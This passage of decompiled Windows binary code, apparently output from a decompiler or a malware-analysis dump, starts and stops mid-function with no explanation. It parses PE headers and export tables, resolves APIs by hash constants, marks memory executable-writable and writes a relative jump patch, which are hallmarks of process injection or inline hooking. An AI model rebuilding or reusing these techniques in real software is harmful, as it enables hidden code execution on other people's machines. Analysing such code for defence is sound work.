				E003D1270(0x588ab3ea,  &_v128);
				E003C9640( &_v128, 0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp+0x1d8], xmm0");
				E003C9640( &_v132, 0x10);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp+0x1e0], xmm0");
				E003C9640( &_v136, 0x20);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp+0x1f0], xmm0");
				E003C9640( &_v140, 0x30);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp+0x1f8], xmm0");
				E003C9640( &_v144, 0x40);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp+0x200], xmm0");
				E003C9640( &_v148, 0x50);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [eax-0x38], xmm0");
				 *((intOrPtr*)( &_v128 - 0x98)) = _t1534;
				E003AD570( &_v280,  &_v136,  &_v128);
				_t1487 = _v140;
				_t1027 = _v136;
				if((_t1487 | _v136) != 0) {
					_push(0x40);
					E003C9350( &_v288);
					E003D0FA0(_t1534, E003C9640( &_v292, 0), __eflags, _t1487, _t1027, 0x40, 0);
					_t1435 = E003C9640( &_v312, 0);
					__eflags = ( *_t1435 & 0x0000ffff) - 0x5a4d;
					if(( *_t1435 & 0x0000ffff) == 0x5a4d) {
						asm("cdq");
						_v560 = _t1435[0x1e] + _t1487;
						asm("adc edx, ebx");
						_v564 = _t1435;
						_push(0x108);
						E003C9350( &_v388);
						E003D0FA0(_t1534, E003C9640( &_v392, 0), __eflags, _v568, _v572, 0x108, 0);
						_push( &_v412);
						E003C9520( &_v316);
						E003C9510( &_v416);
						_t632 = E003C9640( &_v320, 0);
						__eflags =  *_t632 - 0x4550;
						if( *_t632 != 0x4550) {
							goto L3;
						} else {
							_t1481 =  *(_t632 + 0x88);
							_v568 = _t1481;
							_v572 =  *((intOrPtr*)(_t632 + 0x8c));
							__eflags = _t1481;
							if(_t1481 == 0) {
								goto L3;
							} else {
								__eflags = _v572;
								if(_v572 == 0) {
									goto L3;
								} else {
									_push(_v572);
									E003C9350( &_v396);
									_t1011 = E003C9640( &_v400, 0);
									asm("adc ebx, 0x0");
									E003D0FA0(_t1534, _t1011, __eflags, _t1487 + _v576, _t1027, _v580, 0);
									_push( &_v420);
									E003C9520( &_v324);
									E003C9510( &_v424);
									_t1065 = E003C9640( &_v328, 0);
									_t1017 =  *((intOrPtr*)(_t1572 + 0x44));
									 *((intOrPtr*)(_t1065 + 0x1c)) =  *((intOrPtr*)(_t1065 + 0x1c)) - _t1017;
									 *((intOrPtr*)(_t1065 + 0x24)) =  *((intOrPtr*)(_t1065 + 0x24)) - _t1017;
									 *((intOrPtr*)(_t1065 + 0x20)) =  *((intOrPtr*)(_t1065 + 0x20)) - _t1017;
									_t1485 = E003C9640( &_v332,  *((intOrPtr*)(_t1065 + 0x20)) - _t1017);
									__eflags =  *(_t1065 + 0x18);
									if( *(_t1065 + 0x18) > 0) {
										_v560 = _t1534;
										_t1021 = 0;
										__eflags = 0;
										_t1531 = _v576;
										while(1) {
											_t1021 = _t1021 + 1;
											 *((intOrPtr*)(_t1485 + _t1021 * 8 - 8)) =  *((intOrPtr*)(_t1485 + _t1021 * 8 - 8)) - _t1531;
											_t554 = _t1021 - 1; // 0x0
											_t1567 = _t1021 + _t1021;
											__eflags = _t1021 + _t554 -  *(_t1065 + 0x18);
											if(_t1021 + _t554 >=  *(_t1065 + 0x18)) {
												break;
											}
											 *((intOrPtr*)(_t1485 + _t1021 * 8 - 4)) =  *((intOrPtr*)(_t1485 + _t1021 * 8 - 4)) - _t1531;
											__eflags = _t1567 -  *(_t1065 + 0x18);
											if(_t1567 <  *(_t1065 + 0x18)) {
												continue;
											}
											break;
										}
										_t1534 = _v560;
									}
									_push( &_v308);
									E003C93D0( &_v292);
								}
							}
						}
					} else {
						L3:
						_push(0);
						E003C9350( &_v284);
					}
					E003C9510( &_v304);
					E003CA110( &_v88);
					_v544 = 0x41195991;
					asm("pxor xmm0, xmm0");
					asm("movq [esp+0x68], xmm0");
					E003C9670( &_v88, E003C9650( &_v88) + 0x10);
					E003C9640( &_v92, E003C9650( &_v92) + 0xfffffff0);
					asm("movups xmm0, [esp+0x60]");
					asm("pxor xmm1, xmm1");
					asm("movups [eax], xmm0");
					_v552 = 0x77be1f6;
					asm("movq [esp+0x68], xmm1");
					E003C9670( &_v96, E003C9650( &_v96) + 0x10);
					E003C9640( &_v100, E003C9650( &_v100) + 0xfffffff0);
					asm("movups xmm0, [esp+0x60]");
					asm("pxor xmm1, xmm1");
					asm("movups [eax], xmm0");
					_v560 = 0xb5cdecc0;
					asm("movq [esp+0x68], xmm1");
					E003C9670( &_v104, E003C9650( &_v104) + 0x10);
					E003C9640( &_v108, E003C9650( &_v108) + 0xfffffff0);
					asm("movups xmm0, [esp+0x60]");
					_t1573 = _t1572 + 0xfffffff4;
					asm("movups [eax], xmm0");
					asm("movq xmm1, [edx+0xd8]");
					asm("movq [esp], xmm1");
					_v668 =  &_v112;
					E003AE780( &_v312, _t1534, __eflags);
					E003C9640( &_v124, 0);
					asm("movq xmm0, [eax+0x8]");
					asm("movq [esp+0x1e8], xmm0");
					E003C9640( &_v128, 0x10);
					asm("movq xmm0, [eax+0x8]");
					asm("movq [esp+0x210], xmm0");
					_t1438 = E003C9640( &_v132, 0x20);
					_v268 =  *((intOrPtr*)(_t1438 + 8));
					 *((intOrPtr*)(_t1573 + 0x218)) =  *((intOrPtr*)(_t1438 + 0xc));
					_push(0);
					E003C9350( &_v320);
					_push(0);
					E003C9350( &_v308);
					_push(0);
					_push( *0x3d9d74);
					E003B1BA0(__eflags,  &_v284);
					E003C9B10( &_v340);
					E003C0B10( &_v284);
					E003C9670( &_v328, E003C9A90( &_v344, _t1534));
					_t667 = E003C9640( &_v348, 0);
					E003AAC20(_t1569, _t667, E003C9640( &_v336, 0), _v296);
					_t1574 = _t1573 + 8;
					_t1030 = E003C9650( &_v340);
					_t95 = _t1030 + 2; // 0x2
					_v180 = E003AD860( &_v300, 0x20000000, __eflags, _t95);
					_v640 = 0x20000000;
					_t672 = E003ADB60( &_v304, 0x80000000, __eflags, 0x82);
					_v192 = _t672;
					 *(_t1574 + 0x220) = 0x80000000;
					__eflags = _t672 |  *(_t1574 + 0x220);
					if((_t672 |  *(_t1574 + 0x220)) == 0) {
						L6:
						E003C9510( &_v288);
						E003C9510( &_v304);
						E003C9510( &_v320);
						E003C9510( &_v120);
						E003AE2F0(_t1030, _t1574 + 0x1bc, _t1569);
						E003C9510(_t1574 + 0x1ac);
						__eflags = 0;
						return 0;
					} else {
						__eflags = _v124 | _v584;
						if((_v124 | _v584) != 0) {
							E003B0B70( &_v560, 0, 0x80);
							_t1576 = _t1574 + 0xc;
							_v464 = _a4;
							_push(0);
							_push(0);
							E003D2060(_t1030,  &_v400, 0, _t1534);
							_v348 =  *((intOrPtr*)(_t1576 + 0x48));
							_t1449 =  &_v408;
							 *((intOrPtr*)(_t1449 + 0x38)) = _a8;
							_push(_t1449);
							E003AE090( &_v384, _t1534,  &_v352);
							asm("cdq");
							asm("movd xmm1, eax");
							asm("movd xmm0, edx");
							asm("punpckldq xmm1, xmm0");
							asm("movq [esp+0xb0], xmm1");
							_v508 = E003C9650(_a8);
							asm("cdq");
							asm("movd xmm1, eax");
							asm("movd xmm0, edx");
							asm("punpckldq xmm1, xmm0");
							asm("movq [esp+0xc0], xmm1");
							_v492 = E003C9650(_v620);
							asm("cdq");
							asm("movd xmm1, eax");
							asm("movd xmm0, edx");
							asm("punpckldq xmm1, xmm0");
							asm("movq [edi-0xb8], xmm1");
							E003D0FA0(_t1534,  &_v460, __eflags, _v272, _v156, 7,  &_v292);
							_t1154 =  &_v156;
							 *((intOrPtr*)(_t1154 - 0x148)) = _v288;
							 *((intOrPtr*)(_t1154 - 0x144)) =  *((intOrPtr*)(_t1154 - 0x10));
							E003CA110(_t1154);
							_v612 = 0x9cac62c7;
							asm("pxor xmm0, xmm0");
							asm("movq [esp+0x68], xmm0");
							E003C9670( &_v156, E003C9650( &_v156) + 0x10);
							E003C9640( &_v160, E003C9650( &_v160) + 0xfffffff0);
							asm("movups xmm0, [esp+0x60]");
							asm("pxor xmm1, xmm1");
							asm("movups [eax], xmm0");
							_v620 = 0xa8f2638d;
							asm("movq [esp+0x68], xmm1");
							E003C9670( &_v164, E003C9650( &_v164) + 0x10);
							E003C9640( &_v168, E003C9650( &_v168) + 0xfffffff0);
							asm("movups xmm0, [esp+0x60]");
							asm("pxor xmm1, xmm1");
							asm("movups [eax], xmm0");
							_v628 = 0xd8cc7390;
							asm("movq [esp+0x68], xmm1");
							E003C9670( &_v172, E003C9650( &_v172) + 0x10);
							E003C9640( &_v176, E003C9650( &_v176) + 0xfffffff0);
							asm("movups xmm0, [esp+0x60]");
							asm("pxor xmm1, xmm1");
							asm("movups [eax], xmm0");
							_v636 = 0x6a68465a;
							asm("movq [esp+0x68], xmm1");
							E003C9670( &_v180, E003C9650( &_v180) + 0x10);
							E003C9640(_t1576 + 0x22c, E003C9650(_t1576 + 0x228) + 0xfffffff0);
							asm("movups xmm0, [esp+0x60]");
							asm("pxor xmm1, xmm1");
							asm("movups [eax], xmm0");
							_v644 = 0x58d59bc9;
							asm("movq [esp+0x68], xmm1");
							E003C9670(_t1576 + 0x22c, E003C9650(_t1576 + 0x228) + 0x10);
							E003C9640( &_v192, E003C9650( &_v192) + 0xfffffff0);
							asm("movups xmm0, [esp+0x60]");
							asm("pxor xmm1, xmm1");
							asm("movups [eax], xmm0");
							 *((intOrPtr*)(_t1576 + 0x60)) = 0xe9fbf3a8;
							asm("movq [esp+0x68], xmm1");
							E003C9670( &_v196, E003C9650( &_v196) + 0x10);
							E003C9640( &_v200, E003C9650( &_v200) + 0xfffffff0);
							asm("movups xmm0, [esp+0x60]");
							asm("pxor xmm1, xmm1");
							asm("movups [eax], xmm0");
							_v660 = 0x649746ec;
							asm("movq [esp+0x68], xmm1");
							E003C9670(_t1576 + 0x22c, E003C9650(_t1576 + 0x228) + 0x10);
							E003C9640(_t1576 + 0x22c, E003C9650(_t1576 + 0x228) + 0xfffffff0);
							asm("movups xmm0, [esp+0x60]");
							asm("pxor xmm1, xmm1");
							asm("movups [eax], xmm0");
							_v668 = 0x35b39b2b;
							asm("movq [esp+0x68], xmm1");
							E003C9670(_t1576 + 0x22c, E003C9650(_t1576 + 0x228) + 0x10);
							E003C9640( &_v216, E003C9650( &_v216) + 0xfffffff0);
							asm("movups xmm0, [esp+0x60]");
							_t1452 =  &_v220;
							asm("movups [eax], xmm0");
							E003D1270(0x588ab3ea, _t1452);
							E003C9640( &_v220, 0);
							asm("movq xmm0, [eax+0x8]");
							asm("movq [esp+0x70], xmm0");
							E003C9640(_t1576 + 0x22c, 0x10);
							asm("movq xmm0, [eax+0x8]");
							asm("movq [esp+0x78], xmm0");
							E003C9640(_t1576 + 0x22c, 0x20);
							asm("movq xmm0, [eax+0x8]");
							asm("movq [esp+0x80], xmm0");
							E003C9640( &_v232, 0x30);
							asm("movq xmm0, [eax+0x8]");
							asm("movq [esp+0x88], xmm0");
							E003C9640(_t1576 + 0x22c, 0x40);
							asm("movq xmm0, [eax+0x8]");
							asm("movq [esp+0x90], xmm0");
							E003C9640(_t1576 + 0x22c, 0x50);
							asm("movq xmm0, [eax+0x8]");
							asm("movq [esp+0x98], xmm0");
							E003C9640(_t1576 + 0x22c, 0x60);
							asm("movq xmm0, [eax+0x8]");
							asm("movq [esp+0xa0], xmm0");
							E003C9640( &_v248, 0x70);
							asm("movq xmm0, [eax+0x8]");
							asm("movq [ecx-0x100], xmm0");
							_t747 = E003AD530( &_v380, _t1452);
							_v396 = _t747;
							_v400 = _t1452;
							_t1496 = _t1452 - 0xffffffff;
							__eflags = _t747 - 0xffffffff | _t1452 - 0xffffffff;
							if((_t747 - 0xffffffff | _t1452 - 0xffffffff) == 0) {
								E003AE230( &_v388);
								E003D2530(_t1030,  &_v412, 0xffffffff, _t1496, _t1534);
								E003C9510( &_v300);
								E003C9510( &_v316);
								E003C9510( &_v332);
								E003C9510( &_v132);
								E003AE2F0(_t1030, _t1576 + 0x1bc, _t1569);
								E003C9510( &_v256);
								__eflags = 0;
								return 0;
							} else {
								_t1455 = _v108 | _v104;
								__eflags = _t1455;
								if(_t1455 == 0) {
									_v604 = _t1030;
									_t1498 = 0;
									__eflags = 0;
									 *((intOrPtr*)(_t1576 + 0x54)) = _t1534;
									do {
										_push(0);
										E003C9350( &_v428);
										E003B16B0(_t1498, _t1534,  &_v376, 0x57325ee3);
										E003BFDB0( &_v384,  &_v376);
										_t1456 = 0x7fffffff;
										E003C9710( &_v444, _v380, E003C6040(_v380, 0x7fffffff));
										E003C0B10( &_v388);
										E003B8CA0( &_v396);
										_t1537 = _v168;
										_t1034 =  *((intOrPtr*)( &_v452 + 0x120));
										_t768 = E003C9650( &_v452);
										__eflags = _t768;
										if(_t768 <= 0) {
											L25:
											asm("movq xmm0, [esp+0x200]");
											asm("movq [esp], xmm0");
											asm("pxor xmm2, xmm2");
											_v680 = 5;
											_v676 = _v280;
											asm("movq xmm1, [esp+0x210]");
											 *(_t1576 + 0x10) = _v284;
											asm("movq [esp+0x14], xmm1");
											_t1034 = _v148;
											_v660 = _v148;
											_t1534 = _v144;
											_v656 = _v144;
											asm("movq [esp+0x24], xmm2");
											asm("movq [esp+0x2c], xmm2");
											_t770 = E003D04B0(_t1498, _v144);
											__eflags = _t770;
											if(_t770 == 0) {
												E003B22A0(0x3e8, _t1456);
												E003C9510( &_v432);
												_t1455 =  &_v120;
												E003AD570( &_v264, _t1455,  &_v112);
												__eflags = _v116 | _v112;
												if((_v116 | _v112) != 0) {
													_t1030 =  *((intOrPtr*)(_t1576 + 0x50));
													_t1534 = _v604;
													goto L9;
												} else {
													_t974 = E003AD530( &_v264, _t1455);
													_v280 = _t974;
													_v284 = _t1455;
													_t1479 = _t1455 - 0xffffffff;
													__eflags = _t974 - 0xffffffff | _t1455 - 0xffffffff;
													if((_t974 - 0xffffffff | _t1455 - 0xffffffff) == 0) {
														E003AE230( &_v392);
														E003D2530(_t1034,  &_v416, _t1479, _t1498, _t1534);
														E003C9510( &_v304);
														E003C9510( &_v320);
														E003C9510( &_v336);
														E003C9510( &_v136);
														E003AE2F0(_t1034, _t1576 + 0x1bc, _t1569);
														E003C9510( &_v260);
														__eflags = 0;
														return 0;
													} else {
														goto L29;
													}
												}
											} else {
												goto L26;
											}
										} else {
											__eflags = 0;
											_v624 = _t1498;
											_t1498 = _t1537;
											_t1534 = 0;
											while(1) {
												_t1005 = E003C9640( &_v432, _t1534);
												asm("movq xmm0, [esp+0x200]");
												asm("movq [esp], xmm0");
												 *((intOrPtr*)(_t1576 + 8)) = 5;
												_v680 = _v284;
												asm("movq xmm1, [esp+0x1f8]");
												_v676 = _v288;
												_t1456 =  *_t1005 & 0x000000ff;
												asm("movq [esp+0x14], xmm1");
												asm("movq xmm2, [0x3d9d40]");
												 *((intOrPtr*)(_t1576 + 0x1c)) = _t1498;
												_v660 = _t1034;
												_v656 =  *_t1005 & 0x000000ff;
												 *((intOrPtr*)(_t1576 + 0x28)) = 0;
												asm("movq [esp+0x2c], xmm2");
												_t1006 = E003D04B0(_t1498, _t1534);
												__eflags = _t1006;
												if(_t1006 != 0) {
													break;
												}
												E003B22A0(0x64, _t1456);
												_t1498 = _t1498 + 1;
												asm("adc ebx, 0x0");
												_t1534 = _t1534 + 1;
												_t1008 = E003C9650( &_v432);
												__eflags = _t1534 - _t1008;
												if(_t1534 < _t1008) {
													continue;
												} else {
													_t1498 = _v624;
													goto L25;
												}
												goto L95;
											}
											L26:
											E003C9510( &_v432);
											E003AE230( &_v392);
											E003D2530(_t1034,  &_v416, _t1456, _t1498, _t1534);
											E003C9510( &_v304);
											E003C9510( &_v320);
											E003C9510( &_v336);
											E003C9510( &_v136);
											E003AE2F0(_t1034, _t1576 + 0x1bc, _t1569);
											E003C9510( &_v260);
											__eflags = 0;
											return 0;
										}
										goto L95;
										L29:
										_t1498 = _t1498 + 1;
										__eflags = _t1498 - 0xa;
									} while (_t1498 != 0xa);
									E003AE230( &_v392);
									E003D2530(_t1034,  &_v416, _t1479, _t1498, _t1534);
									E003C9510( &_v304);
									E003C9510( &_v320);
									E003C9510( &_v336);
									E003C9510( &_v136);
									E003AE2F0(_t1034, _t1576 + 0x1bc, _t1569);
									E003C9510( &_v260);
									__eflags = 0;
									return 0;
								} else {
									L9:
									 *((intOrPtr*)(_t1576 + 0x50)) = _t1030;
									_t1499 = 0;
									__eflags = 0;
									_v604 = _t1534;
									_t1538 = _v284;
									_t1035 = _v280;
									while(1) {
										asm("movq xmm0, [esp+0x200]");
										asm("movq xmm1, [esp+0x1f8]");
										asm("pxor xmm2, xmm2");
										asm("movq [esp], xmm0");
										_v680 = 5;
										_v676 = _t1035;
										 *(_t1576 + 0x10) = _t1538;
										asm("movq [esp+0x14], xmm1");
										_v660 = _v148;
										asm("movq xmm3, [0x3d9d48]");
										_v656 = _v144;
										asm("movq [esp+0x24], xmm2");
										asm("movq [esp+0x2c], xmm3");
										_t778 = E003D04B0(_t1499, _t1538);
										__eflags = _t778;
										if(_t778 == 0) {
											break;
										}
										_t1035 = E003AD530( &_v264, _t1455);
										_t1538 = _t1455;
										_t1455 = _t1538 - 0xffffffff;
										__eflags = _t1035 - 0xffffffff | _t1455;
										if((_t1035 - 0xffffffff | _t1455) == 0) {
											E003AE230( &_v392);
											E003D2530(_t1035,  &_v416, _t1455, _t1499, _t1538);
											E003C9510( &_v304);
											E003C9510( &_v320);
											E003C9510( &_v336);
											E003C9510( &_v136);
											E003AE2F0(_t1035, _t1576 + 0x1bc, _t1569);
											E003C9510( &_v260);
											__eflags = 0;
											return 0;
										} else {
											_t1499 = _t1499 + 1;
											__eflags = _t1499 - 0xa;
											if(_t1499 != 0xa) {
												continue;
											} else {
												E003AE230( &_v392);
												E003D2530(_t1035,  &_v416, _t1455, _t1499, _t1538);
												E003C9510( &_v304);
												E003C9510( &_v320);
												E003C9510( &_v336);
												E003C9510( &_v136);
												E003AE2F0(_t1035, _t1576 + 0x1bc, _t1569);
												E003C9510( &_v260);
												__eflags = 0;
												return 0;
											}
										}
										goto L95;
									}
									_v284 = _t1538;
									_t1500 = 0;
									__eflags = 0;
									_v280 = _t1035;
									_t1539 = _v284;
									_t1036 = _v280;
									while(1) {
										_push(0x80);
										_push(_v144);
										_push(_v148);
										_push(_t1539);
										_push(_t1036);
										_t1457 =  &_v576;
										__eflags = E003AD170( &_v264, _t1457);
										if(__eflags != 0) {
											break;
										}
										_t1036 = E003AD530( &_v284, _t1457);
										_t1539 = _t1457;
										_t1477 = _t1539 - 0xffffffff;
										__eflags = _t1036 - 0xffffffff | _t1539 - 0xffffffff;
										if((_t1036 - 0xffffffff | _t1539 - 0xffffffff) == 0) {
											E003AE230( &_v412);
											E003D2530(_t1036,  &_v436, _t1477, _t1500, _t1539);
											E003C9510( &_v324);
											E003C9510( &_v340);
											E003C9510( &_v356);
											E003C9510( &_v156);
											E003AE2F0(_t1036,  &_v264, _t1569);
											E003C9510( &_v280);
											__eflags = 0;
											return 0;
										} else {
											_t1500 = _t1500 + 1;
											__eflags = _t1500 - 0xa;
											if(_t1500 != 0xa) {
												continue;
											} else {
												E003AE230( &_v412);
												E003D2530(_t1036,  &_v436, _t1477, _t1500, _t1539);
												E003C9510( &_v324);
												E003C9510( &_v340);
												E003C9510( &_v356);
												E003C9510( &_v156);
												E003AE2F0(_t1036,  &_v264, _t1569);
												E003C9510( &_v280);
												__eflags = 0;
												return 0;
											}
										}
										goto L95;
									}
									_v300 = _t1036;
									 *((intOrPtr*)(_t1576 + 0x64)) = _v620;
									asm("cdq");
									asm("movd xmm1, ebx");
									_t1038 =  &_v616;
									_t1501 =  *((intOrPtr*)(_t1038 + 0x1c8));
									_t781 =  &_v604;
									 *(_t781 + 0x12c) = _t1539;
									asm("movd xmm0, edx");
									asm("punpckldq xmm1, xmm0");
									_t1540 =  *((intOrPtr*)(_t781 - 0x14));
									 *((intOrPtr*)(_t781 - 0xc)) = 0;
									 *((intOrPtr*)(_t781 - 8)) =  *((intOrPtr*)(_t1038 + 0x1c8));
									asm("movdqu [eax-0x28], xmm1");
									asm("movq [eax], xmm1");
									_t1459 =  &_v612;
									_t782 = E003D0C90(_t1540, _t1459, __eflags, _t781, 0x40, _t1038);
									__eflags = _t782;
									if(_t782 != 0) {
										E003AE230( &_v412);
										E003D2530(_t1038,  &_v436, _t1459, _t1501, _t1540);
										E003C9510( &_v324);
										E003C9510( &_v340);
										E003C9510( &_v356);
										E003C9510( &_v156);
										E003AE2F0(_t1038,  &_v264, _t1569);
										E003C9510( &_v280);
										__eflags = 0;
										return 0;
									} else {
										__eflags = 0;
										_v624 = _t1540;
										_v628 = 0;
										_t1040 = _v300;
										_t1503 = _v620;
										_t1542 = _v160;
										while(1) {
											L35:
											asm("movq xmm0, [esp+0x200]");
											asm("movq [esp], xmm0");
											asm("pxor xmm2, xmm2");
											_v700 = 5;
											 *(_t1576 + 0xc) = _t1040;
											asm("movq xmm1, [esp+0x1f8]");
											 *(_t1576 + 0x10) = _v304;
											asm("movq [esp+0x14], xmm1");
											_v680 = _t1542;
											_v676 = _t1503;
											asm("movq [esp+0x24], xmm2");
											asm("movdqu xmm3, [esp+0x40]");
											asm("movq [esp+0x2c], xmm3");
											_t793 = E003D04B0(_t1503, _t1542);
											__eflags = _t793;
											if(_t793 == 0) {
												break;
											}
											_t1055 = 0;
											__eflags = 0;
											while(1) {
												_t911 = E003ACA10( &_v284, __eflags);
												_t1326 = _t1459;
												_t1459 = _t911 | _t1326;
												__eflags = _t1459;
												if(_t1459 != 0) {
													break;
												}
												__eflags = _t1055 - 0x20;
												if(_t1055 == 0x20) {
													_t1040 = 0xffffffff;
													_v304 = 0xffffffff;
												} else {
													E003B22A0(0x5dc, _t1459);
													_t1055 = _t1055 + 1;
													continue;
												}
												L47:
												__eflags = _t1040 - 0xffffffff | _v304 - 0xffffffff;
												if((_t1040 - 0xffffffff | _v304 - 0xffffffff) == 0) {
													E003AE230( &_v412);
													E003D2530(_t1040,  &_v436, 0xffffffff, _t1503, _t1542);
													E003C9510( &_v324);
													E003C9510( &_v340);
													E003C9510( &_v356);
													E003C9510( &_v156);
													E003AE2F0(_t1040,  &_v264, _t1569);
													E003C9510( &_v280);
													__eflags = 0;
													return 0;
												} else {
													_t1459 = _v628 + 1;
													_v628 = _t1459;
													__eflags = _t1459 - 0xa;
													if(_t1459 != 0xa) {
														goto L35;
													} else {
														E003AE230( &_v412);
														E003D2530(_t1040,  &_v436, _t1459, _t1503, _t1542);
														E003C9510( &_v324);
														E003C9510( &_v340);
														E003C9510( &_v356);
														E003C9510( &_v156);
														E003AE2F0(_t1040,  &_v264, _t1569);
														E003C9510( &_v280);
														__eflags = 0;
														return 0;
													}
												}
												goto L95;
											}
											_v304 = _t1326;
											_t1040 = _t911;
											goto L47;
										}
										_v300 = _t1040;
										__eflags = 0;
										_t1041 = _v304;
										_t1543 = _v300;
										_v644 = 0;
										while(1) {
											_t795 = E003C9640( &_v324, 0);
											_t1504 = _t795;
											_push(E003C9650( &_v328));
											_push(_v624);
											_push(_v164);
											_push(_t1041);
											_push(_t1543);
											_t1460 = _t795;
											__eflags = E003AD170( &_v288, _t1460);
											if(__eflags != 0) {
												break;
											}
											_t1518 = 0;
											__eflags = 0;
											while(1) {
												_t1543 = E003ACA10( &_v304, __eflags);
												_t1041 = _t1460;
												__eflags = _t1543 | _t1041;
												if((_t1543 | _t1041) != 0) {
													break;
												}
												__eflags = _t1518 - 0x20;
												if(_t1518 == 0x20) {
													_t1543 = 0xffffffff;
													_t1041 = 0xffffffff;
												} else {
													E003B22A0(0x5dc, _t1460);
													_t1518 = _t1518 + 1;
													continue;
												}
												break;
											}
											_t1472 = _t1041 - 0xffffffff;
											__eflags = _t1543 - 0xffffffff | _t1041 - 0xffffffff;
											if((_t1543 - 0xffffffff | _t1041 - 0xffffffff) == 0) {
												E003AE230( &_v432);
												E003D2530(_t1041, _t1576 + 0x110, _t1472, _t1518, _t1543);
												E003C9510( &_v344);
												E003C9510(_t1576 + 0x170);
												E003C9510( &_v376);
												E003C9510( &_v176);
												E003AE2F0(_t1041,  &_v284, _t1569);
												E003C9510( &_v300);
												__eflags = 0;
												return 0;
											} else {
												_t900 =  *((intOrPtr*)(_t1576 + 0x40)) + 1;
												 *((intOrPtr*)(_t1576 + 0x40)) = _t900;
												__eflags = _t900 - 0xa;
												if(_t900 != 0xa) {
													continue;
												} else {
													E003AE230( &_v432);
													E003D2530(_t1041, _t1576 + 0x110, _t1472, _t1518, _t1543);
													E003C9510( &_v344);
													E003C9510(_t1576 + 0x170);
													E003C9510( &_v376);
													E003C9510( &_v176);
													E003AE2F0(_t1041,  &_v284, _t1569);
													E003C9510( &_v300);
													__eflags = 0;
													return 0;
												}
											}
											goto L95;
										}
										_v320 = _t1543;
										_t798 =  &_v636;
										 *(_t798 + 0x138) = _t1041;
										_t1544 =  *((intOrPtr*)(_t798 - 8));
										_t1461 = _t1576 + 0x6c;
										_t799 = E003D0C90( *((intOrPtr*)(_t798 - 8)), _t1576 + 0x6c, __eflags,  &_v624, _v636, _t798);
										__eflags = _t799;
										if(_t799 == 0) {
											_push(0);
											E003C9350(_t1576 + 0x44);
											_v644 = 0xe9;
											E003C9710( &_v668,  &_v644, 1);
											_v660 = _v192 -  *((intOrPtr*)( &_v660 + 0x154)) + 0xfffffffb;
											E003C9710( &_v676,  &_v660, 4);
											_t1043 =  &_v656;
											asm("movq xmm0, [0x3d9d50]");
											 *((intOrPtr*)(_t1043 + 4)) = _v328;
											 *((intOrPtr*)(_t1043 + 8)) =  *((intOrPtr*)(_t1043 + 0x1bc));
											asm("movq [ebx+0xc], xmm0");
											E003D0C90(_t1544, _t1576 + 0x6c, __eflags,  &_v644, 0x40, _t1043);
											__eflags = 0;
											_v676 = 0;
											_t1044 = _v356;
											_t1545 = _v352;
											while(1) {
												_t810 = E003C9640( &_v668, 0);
												_push(E003C9650(_t1576 + 0x40));
												_push(_v200);
												_push(_v316);
												_push(_t1044);
												_push(_t1545);
												_t1465 = _t810;
												_t812 = E003AD170( &_v312, _t1465);
												__eflags = _t812;
												if(_t812 != 0) {
													break;
												}
												_t1514 = 0;
												__eflags = 0;
												while(1) {
													_t1545 = E003ACA10( &_v328, __eflags);
													_t1044 = _t1465;
													__eflags = _t1545 | _t1044;
													if((_t1545 | _t1044) != 0) {
														break;
													}
													__eflags = _t1514 - 0x20;
													if(_t1514 == 0x20) {
														_t1545 = 0xffffffff;
														_t1044 = 0xffffffff;
													} else {
														E003B22A0(0x5dc, _t1465);
														_t1514 = _t1514 + 1;
														continue;
													}
													break;
												}
												_t1470 = _t1044 - 0xffffffff;
												__eflags = _t1545 - 0xffffffff | _t1044 - 0xffffffff;
												if((_t1545 - 0xffffffff | _t1044 - 0xffffffff) == 0) {
													E003C9510(_t1576 + 0x40);
													E003AE230(_t1576 + 0x128);
													E003D2530(_t1044,  &_v480, _t1470, _t1514, _t1545);
													E003C9510( &_v368);
													E003C9510( &_v384);
													E003C9510( &_v400);
													E003C9510( &_v200);
													E003AE2F0(_t1044,  &_v308, _t1569);
													E003C9510( &_v324);
													__eflags = 0;
													return 0;
												} else {
													_t865 = _v668 + 1;
													_v668 = _t865;
													__eflags = _t865 - 0xa;
													if(_t865 != 0xa) {
														continue;
													} else {
														E003C9510(_t1576 + 0x40);
														E003AE230(_t1576 + 0x128);
														E003D2530(_t1044,  &_v480, _t1470, _t1514, _t1545);
														E003C9510( &_v368);
														E003C9510( &_v384);
														E003C9510( &_v400);
														E003C9510( &_v200);
														E003AE2F0(_t1044,  &_v308, _t1569);
														E003C9510( &_v324);
														__eflags = 0;
														return 0;
													}
												}
												goto L95;
											}
											_v348 = _t1044;
											_t1045 = 0;
											__eflags = 0;
											_v344 = _t1545;
											_t1466 = _v348;
											_t813 = _t1545;
											while(1) {
												asm("movq xmm0, [esp+0x200]");
												asm("movq [esp], xmm0");
												asm("pxor xmm1, xmm1");
												_v744 = 5;
												_v740 = _t813;
												_v736 = _t1466;
												_v732 = _v332;
												 *((intOrPtr*)(_t1576 + 0x18)) = _v216;
												_t1546 =  *((intOrPtr*)(_t1576 + 0x21c));
												_v724 =  *((intOrPtr*)(_t1576 + 0x21c));
												_t1507 =  *((intOrPtr*)(_t1576 + 0x220));
												 *((intOrPtr*)(_t1576 + 0x20)) =  *((intOrPtr*)(_t1576 + 0x220));
												asm("movq [esp+0x24], xmm1");
												asm("movq [esp+0x2c], xmm1");
												_t815 = E003D04B0( *((intOrPtr*)(_t1576 + 0x220)),  *((intOrPtr*)(_t1576 + 0x21c)));
												__eflags = _t815;
												if(_t815 == 0) {
													break;
												}
												_t1547 = 0;
												__eflags = 0;
												while(1) {
													_t813 = E003ACA10( &_v328, __eflags);
													__eflags = _t813 | _t1466;
													if((_t813 | _t1466) != 0) {
														break;
													}
													__eflags = _t1547 - 0x20;
													if(_t1547 == 0x20) {
														_t813 = 0xffffffff;
														_t1466 = 0xffffffff;
													} else {
														E003B22A0(0x5dc, _t1466);
														_t1547 = _t1547 + 1;
														continue;
													}
													break;
												}
												_t1549 = _t1466 - 0xffffffff;
												_t1510 = _t813 - 0xffffffff | _t1466 - 0xffffffff;
												__eflags = _t813 - 0xffffffff | _t1466 - 0xffffffff;
												if((_t813 - 0xffffffff | _t1466 - 0xffffffff) == 0) {
													E003C9510(_t1576 + 0x40);
													E003AE230(_t1576 + 0x128);
													E003D2530(_t1045,  &_v480, _t1466, _t1510, _t1549);
													E003C9510( &_v368);
													E003C9510( &_v384);
													E003C9510( &_v400);
